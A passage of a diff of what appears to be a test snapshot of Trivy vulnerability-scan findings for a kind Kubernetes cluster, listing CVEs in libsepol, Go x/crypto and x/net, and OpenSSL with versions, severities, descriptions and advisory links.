"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", + ], + }, + "category": "Vulnerability", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "crash in a golang.org/x/crypto/ssh server", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://bugzilla.redhat.com/1989570", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "2.8-1", - "packageName": "libsepol1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", - ], - }, - "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", + }, + { + "type": "URL", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "2.8-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20211209124913-491a49abca63", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-44716", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "https://access.redhat.com/security/cve/CVE-2021-44716", + "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "https://github.com/golang/go/issues/50058", + "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "https://go.dev/cl/369794", + "https://go.dev/issue/50058", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "https://linux.oracle.com/cve/CVE-2021-44716.html", + "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "https://pkg.go.dev/vuln/GO-2022-0288", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220121-0002/", + "https://www.cve.org/CVERecord?id=CVE-2021-44716", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "golang: net/http: limit growth of header canonicalization cache", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2021-44716", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "https://access.redhat.com/security/cve/CVE-2021-44716", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://github.com/golang/go/issues/50058", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://go.dev/cl/369794", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://go.dev/issue/50058", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "value": "https://pkg.go.dev/vuln/GO-2022-0288", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36087", - "installedVersion": "2.8-1", - "packageName": "libsepol1", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36087", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", - "https://linux.oracle.com/cve/CVE-2021-36087.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36087", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36087", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: 